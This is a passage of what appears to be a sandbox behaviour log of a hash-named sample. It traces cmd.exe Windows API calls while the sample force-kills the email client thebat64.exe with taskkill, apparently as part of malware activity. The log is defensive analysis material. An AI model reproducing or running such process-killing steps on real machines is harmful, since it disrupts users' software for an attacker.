lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.838] RegCloseKey (hKey=0x88) returned 0x0 [0223.838] time (in: timer=0x0 | out: timer=0x0) returned 0x6234424e [0223.839] srand (_Seed=0x6234424e) [0223.839] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thebat64.exe \"" [0223.839] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thebat64.exe \"" [0223.839] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0223.839] GetProcessHeap () returned 0x5f0000 [0223.839] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x5f9b38 [0223.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f9b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0223.839] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0223.839] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0223.839] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0223.839] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0223.839] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0223.839] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0223.839] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0223.840] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0223.840] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0223.840] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0223.840] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0223.840] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0223.840] GetProcessHeap () returned 0x5f0000 [0223.841] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f86e8) returned 1 [0223.841] GetEnvironmentStringsW () returned 0x5f7cc0* [0223.841] GetProcessHeap () returned 0x5f0000 [0223.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa32) returned 0x5fa790 [0223.841] FreeEnvironmentStringsA (penv="A") returned 1 [0223.841] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0223.841] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0223.841] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0223.841] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0223.841] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0223.842] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0223.842] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0223.842] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0223.842] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0223.842] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0223.842] GetProcessHeap () returned 0x5f0000 [0223.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x44) returned 0x5f05c8 [0223.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0223.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0223.842] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0223.843] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5f0618 [0223.843] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0223.843] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5f0618 [0223.843] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0223.843] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0223.844] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5f0618 [0223.844] FindClose (in: hFindFile=0x5f0618 | out: hFindFile=0x5f0618) returned 1 [0223.844] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0223.844] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0223.844] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0223.844] GetProcessHeap () returned 0x5f0000 [0223.845] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fa790) returned 1 [0223.845] GetEnvironmentStringsW () returned 0x5f7cc0* [0223.845] GetProcessHeap () returned 0x5f0000 [0223.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa76) returned 0x5f9d50 [0223.845] FreeEnvironmentStringsA (penv="=") returned 1 [0223.845] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0223.845] GetProcessHeap () returned 0x5f0000 [0223.845] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f05c8) returned 1 [0223.846] GetProcessHeap () returned 0x5f0000 [0223.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400e) returned 0x5fbc50 [0223.846] GetProcessHeap () returned 0x5f0000 [0223.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4c) returned 0x5fa7d0 [0223.846] GetProcessHeap () returned 0x5f0000 [0223.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x5ffc68 [0223.847] GetProcessHeap () returned 0x5f0000 [0223.847] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x603c78 [0223.849] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0223.849] GetProcessHeap () returned 0x5f0000 [0223.849] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x5fa828 [0223.849] SetErrorMode (uMode=0x0) returned 0x8003 [0223.849] SetErrorMode (uMode=0x1) returned 0x0 [0223.850] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5fa830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0223.850] SetErrorMode (uMode=0x8003) returned 0x1 [0223.850] GetProcessHeap () returned 0x5f0000 [0223.850] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa828, Size=0x7e) returned 0x5fa828 [0223.850] GetProcessHeap () returned 0x5f0000 [0223.850] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa828) returned 0x7e [0223.850] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0223.850] GetProcessHeap () returned 0x5f0000 [0223.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x62) returned 0x5fa8b0 [0223.850] GetProcessHeap () returned 0x5f0000 [0223.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb8) returned 0x5fa920 [0223.851] GetProcessHeap () returned 0x5f0000 [0223.851] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa920, Size=0x62) returned 0x5fa920 [0223.851] GetProcessHeap () returned 0x5f0000 [0223.851] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa920) returned 0x62 [0223.851] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0223.851] GetProcessHeap () returned 0x5f0000 [0223.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe0) returned 0x5fa990 [0223.856] GetProcessHeap () returned 0x5f0000 [0223.856] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fa990, Size=0x76) returned 0x5fa990 [0223.857] GetProcessHeap () returned 0x5f0000 [0223.857] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fa990) returned 0x76 [0223.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0223.857] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im thebat64.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0223.858] GetLastError () returned 0x3 [0223.858] GetProcessHeap () returned 0x5f0000 [0223.858] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5ffc68) returned 1 [0223.858] GetProcessHeap () returned 0x5f0000 [0223.859] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x603c78) returned 1 [0223.859] GetProcessHeap () returned 0x5f0000 [0223.859] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbc50) returned 1 [0223.859] GetConsoleOutputCP () returned 0x1b5 [0223.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0223.860] GetUserDefaultLCID () returned 0x409 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0223.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0223.863] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0223.863] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0223.863] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0223.863] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0223.863] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0223.863] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0223.866] GetProcessHeap () returned 0x5f0000 [0223.866] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20c) returned 0x5faa58 [0223.866] GetConsoleTitleW (in: lpConsoleTitle=0x5faa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0223.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0223.868] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0223.868] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0223.868] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0223.869] GetProcessHeap () returned 0x5f0000 [0223.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x5fbc50 [0223.869] GetProcessHeap () returned 0x5f0000 [0223.869] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbc50) returned 1 [0223.870] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0223.870] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0223.870] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0223.870] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0223.870] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0223.870] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0223.870] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0223.870] GetProcessHeap () returned 0x5f0000 [0223.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x5fac70 [0223.870] GetProcessHeap () returned 0x5f0000 [0223.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x5f0578 [0223.884] GetProcessHeap () returned 0x5f0000 [0223.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x34) returned 0x5facd0 [0223.885] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0223.889] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0223.889] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0223.889] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0223.889] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0223.889] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0223.889] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0223.889] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0223.889] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0223.889] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0223.889] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0223.889] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0223.889] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0223.889] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0223.889] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0223.889] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0223.889] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0223.889] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0223.889] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0223.889] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0223.889] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0223.889] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0223.889] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0223.889] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0223.889] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0223.889] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0223.889] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0223.889] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0223.890] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0223.890] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0223.890] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0223.890] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0223.890] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0223.890] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0223.890] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0223.890] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0223.890] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0223.890] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0223.890] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0223.890] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0223.890] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0223.890] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0223.890] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0223.890] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0223.890] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0223.890] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0223.890] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0223.890] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0223.890] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0223.890] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0223.890] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0223.890] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0223.890] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0223.890] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0223.890] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0223.890] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0223.891] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0223.891] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0223.891] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0223.891] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0223.891] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0223.891] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0223.891] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0223.891] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0223.891] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0223.891] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0223.891] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0223.891] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0223.891] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0223.891] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0223.891] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0223.891] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0223.891] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0223.891] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0223.891] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0223.891] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0223.891] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0223.891] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0223.891] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0223.891] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0223.892] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0223.892] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0223.892] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0223.892] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0223.892] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0223.892] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0223.892] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0223.892] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0223.892] GetProcessHeap () returned 0x5f0000 [0223.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x210) returned 0x5fad10 [0223.892] GetProcessHeap () returned 0x5f0000 [0223.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x46) returned 0x5faf28 [0223.892] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0223.893] GetProcessHeap () returned 0x5f0000 [0223.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x418) returned 0x5f05c8 [0223.893] SetErrorMode (uMode=0x0) returned 0x8003 [0223.893] SetErrorMode (uMode=0x1) returned 0x0 [0223.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5f05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0223.893] SetErrorMode (uMode=0x8003) returned 0x1 [0223.893] GetProcessHeap () returned 0x5f0000 [0223.893] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f05c8, Size=0x56) returned 0x5f05c8 [0223.893] GetProcessHeap () returned 0x5f0000 [0223.893] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f05c8) returned 0x56 [0223.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0223.893] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.893] GetProcessHeap () returned 0x5f0000 [0223.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x110) returned 0x5faf78 [0223.893] GetProcessHeap () returned 0x5f0000 [0223.893] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x218) returned 0x5f0628 [0223.898] GetProcessHeap () returned 0x5f0000 [0223.898] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f0628, Size=0x112) returned 0x5f0628 [0223.898] GetProcessHeap () returned 0x5f0000 [0223.898] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f0628) returned 0x112 [0223.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0223.898] GetProcessHeap () returned 0x5f0000 [0223.898] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe0) returned 0x5fb090 [0223.900] GetProcessHeap () returned 0x5f0000 [0223.900] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fb090, Size=0x76) returned 0x5fb090 [0223.900] GetProcessHeap () returned 0x5f0000 [0223.900] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fb090) returned 0x76 [0223.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0223.900] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0223.901] GetLastError () returned 0x2 [0223.901] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0223.901] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5fb110 [0223.901] GetProcessHeap () returned 0x5f0000 [0223.901] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x5f7748 [0223.901] FindClose (in: hFindFile=0x5fb110 | out: hFindFile=0x5fb110) returned 1 [0223.901] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0223.901] GetLastError () returned 0x2 [0223.902] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5fb110 [0223.902] GetProcessHeap () returned 0x5f0000 [0223.902] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f7748, Size=0x4) returned 0x5fb150 [0223.902] FindClose (in: hFindFile=0x5fb110 | out: hFindFile=0x5fb110) returned 1 [0223.902] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.902] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.902] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: 